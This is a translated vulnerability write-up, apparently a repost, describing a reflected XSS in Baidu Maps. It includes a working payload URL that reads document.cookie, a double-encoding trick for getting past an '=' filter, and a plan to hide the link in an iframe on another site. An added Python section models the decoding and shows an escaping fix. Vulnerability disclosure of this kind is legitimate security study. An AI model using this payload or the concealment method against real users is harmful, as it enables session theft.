Baidu map persistent XSS Vulnerability

Source: Internet
Author: User

<script>alert(/I am the title party/)</script>

1. Baidu Maps has a reflected XSS vulnerability, but it can be turned into a persistent one.






2. The following link triggers the XSS:
 

http://map.baidu.com/?newmap=1&shareurl=2&l=12&tn=B_NORMAL_MAP&c=13382905,3515188&s=bd%26fstq%3D1%26from%3Dwebmap%26c%3D179%26pn%3D0%26rn%3D10%26wd%3D<!XSS!>%26sivtp%3D1%26l%3D12%26bdfrom%3D1





3. In the URL above, everything from the fstq parameter onward (the parameters nested inside s) needs to be URL-encoded; if they are not encoded, the search comes back blank. For example, visiting the decoded form:
 

http://map.baidu.com/?newmap=1&shareurl=2&l=12&tn=B_NORMAL_MAP&c=13382905,3515188&s=bd&fstq=1&from=webmap&c=179&pn=0&rn=10&wd=<!XSS!>&sivtp=1&l=12&bdfrom=1




 





4. If the search shows up empty while testing, this is most likely the cause.




5. The parameter carrying the XSS is wd: a single quote in this parameter is treated as if it were a double quote, so it closes the attribute and what follows is parsed as further attributes. The injection point is inside an <a> tag.
 











6. Knowing this, construct the payload:
 

'onmousemove="alert(document.cookie)"style="font-size:999px;cursor: default !important;"





7. In the style attribute, the font size is set to a very large value.





8. The = sign is encoded twice: while testing this parameter, the search content was cleared whenever a literal = was present, and a doubly encoded = is not cleared.
 

= → %3d → %253d









The constructed URL:

http://map.baidu.com/?newmap=1&shareurl=2&l=12&tn=B_NORMAL_MAP&c=13382905,3515188&s=bd%26fstq%3D1%26from%3Dwebmap%26c%3D179%26pn%3D0%26rn%3D10%26wd%3D'onmousemove%253D%22alert(document.cookie)%22style%253d%22font-size:999px;cursor:%20default%20!important;%22%26sivtp%3D1%26l%3D12%26bdfrom%3D1
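Added example, not code from the original post or from Baidu: a Python model of the pipeline steps 3 to 8 describe. It shows why blanking the search on a literal `=` fails once the nested `s` parameter is decoded a second time, and replaces the blacklist with attribute-context encoding at the sink; the filter position, the `<a>` markup and the function names are assumptions.

```python
# Added example, not code from the original post or from Baidu: a model of the
# pipeline described in steps 3 to 8, showing why a blacklist on '=' fails when
# the parameter is decoded twice, and the attribute-context encoding that fixes
# the sink. Filter position and <a> markup are assumptions based on the write-up.
import html
from urllib.parse import unquote

# The constructed URL from the write-up, copied as-is.
PAYLOAD_URL = ("http://map.baidu.com/?newmap=1&shareurl=2&l=12&tn=B_NORMAL_MAP"
               "&c=13382905,3515188&s=bd%26fstq%3D1%26from%3Dwebmap%26c%3D179"
               "%26pn%3D0%26rn%3D10%26wd%3D'onmousemove%253D%22alert(document.cookie)"
               "%22style%253d%22font-size:999px;cursor:%20default%20!important;%22"
               "%26sivtp%3D1%26l%3D12%26bdfrom%3D1")

def split_pairs(qs: str) -> dict:
    """Split 'k=v&k2=v2' into a dict without percent-decoding anything."""
    return dict(pair.partition("=")[::2] for pair in qs.split("&"))

def resolve_wd(url: str) -> str:
    """Model of the nested 's' parameter: the outer query string is decoded
    once, then the 'fstq=...&wd=...' string inside it is decoded again."""
    outer = {unquote(k): unquote(v)
             for k, v in split_pairs(url.split("?", 1)[1]).items()}
    wd_once = split_pairs(outer.get("s", "")).get("wd", "")
    # Assumed blacklist: the search is blanked if a literal '=' is visible at
    # this stage. A doubly encoded '%253D' is only '%3D' here, so it passes.
    if "=" in wd_once:
        return ""
    return unquote(wd_once)  # second decode turns %3D into a real '='

def render_vulnerable(wd: str) -> str:
    """Sink as the write-up describes it: the term lands in a single-quoted
    attribute of an <a> tag unescaped, so a quote opens new attributes."""
    return f"<a href='#' title='{wd}'>{wd}</a>"

def render_fixed(wd: str) -> str:
    """Fix: encode for the HTML attribute context instead of blacklisting.
    html.escape(quote=True) turns & < > \" ' into entities, so the value can
    never close the attribute, whatever the decoding layers let through."""
    safe = html.escape(wd, quote=True)
    return f"<a href='#' title='{safe}'>{safe}</a>"

if __name__ == "__main__":
    wd = resolve_wd(PAYLOAD_URL)
    print("wd after both decodes :", wd)
    print("vulnerable markup      :", render_vulnerable(wd))
    print("fixed markup           :", render_fixed(wd))
```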







9.
 







10. The XSS fires when the mouse is moved to the left.










11. At this point Baidu would say that only Tom would click this link and then move the mouse over it.





12. In that case, an iframe can be used to hide it.







13. The final constructed code is as follows:


 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">







14. In short, the code above loads the reflected XSS link in an iframe whose width and height match the area covered by the XSS. To hide the payload that would otherwise show in the search bar above, the iframe is given an absolute position with a negative offset, moving it up so that it covers the search bar and is not seen.





15. The result:


 











16. As the figure above shows, once the persistent XSS is formed it can be placed on your own website.

Solution:

Although I don't know why single quotes can be used as double quotes, I feel pretty good.
